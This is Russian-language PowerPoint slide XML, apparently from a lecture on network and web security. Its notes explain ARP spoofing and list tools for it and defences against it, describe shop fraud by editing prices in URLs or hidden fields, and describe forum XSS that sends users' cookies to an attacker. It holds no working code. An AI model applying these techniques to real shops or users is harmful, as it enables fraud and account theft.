              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Не то сына, не то дочь;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Не мышонка, не лягушку,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>А неведому зверюшку“.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ARP-spoofing — техника атаки в Ethernet сетях, позволяющая перехватывать трафик между хостами. Основана на использовании протокола ARP.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>При использовании в распределённой ВС алгоритмов удалённого поиска существует возможность осуществления в такой сети типовой удалённой атаки «ложный объект РВС». Анализ безопасности протокола ARP показывает, что, перехватив на атакующем хосте внутри данного сегмента сети широковещательный ARP-запрос, можно послать ложный ARP-ответ, в котором объявить себя искомым хостом (например, маршрутизатором), и в дальнейшем активно контролировать сетевой трафик дезинформированного хоста, воздействуя на него по схеме «ложный объект РВС».</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Инструменты для выполнения ARP-spoofing’а:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cain &amp; Abel</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>dsniff</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>arp-sk</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ARP Builder</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>AyCarrumba</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Инструменты и методы для обнаружения и предотвращения ARP-spoofing’а:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Программы arpwatch, BitCometAntiARP</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Организация VLAN'ов</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>использование PPTP и PPPoE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>настроить в локальной сети IPSec (шифрованный трафик между узлами вместо открытого)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="337"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Покупки в интернет-магазинах обманным путем</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Лучшие друзья хакера — бездарные программисты. И хотя данный факт известен уже давно, злоумышленникам все же удается обнаруживать интернет-магазины, в которых они могут с минимальными издержками манипулировать ценами товаров.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>На некоторых подобных сайтах при помещении товара в корзину его стоимость отображается в URL-адресе. Хакеру необходимо всего лишь изменить указанное значение, в результате чего можно будет, например, приобрести кейс не за 8000, а за 200 рублей. В других магазинах хакеры используют абсолютно легальное браузерное расширение (Web Developer для Mozilla Firefox или HtmlBar для Internet Explorer), которое отображает скрытые поля (Hidden Fields) на странице. Эти поля могут содержать различную информацию, например название товара, его номер и количество. А в некоторых магазинах здесь же указана и цена. Все, что остается сделать, — это изменить стоимость, и товар станет доступным за символические деньги. Кроме того, система оформления заказа принимает даже отрицательные суммы, что позволяет хакерам без труда начислять себе бонусы. Ввиду использования автоматизированных методов расчета владелец магазина сможет установить факт мошенничества лишь спустя несколько недель.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Некоторые форумы позволяют пользователю использовать HTML-теги для форматирования текста. Если отсутствует должный уровень фильтрации, злонамеренный пользователь может вставить такие теги &lt;script&gt;, который будет отправлять хакеру HTTP-Cookie пользователей, открывших некоторую тему форума или незаметно открывать произвольную ссылку в контексте браузера пользователя.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Подробнее:</a:t>
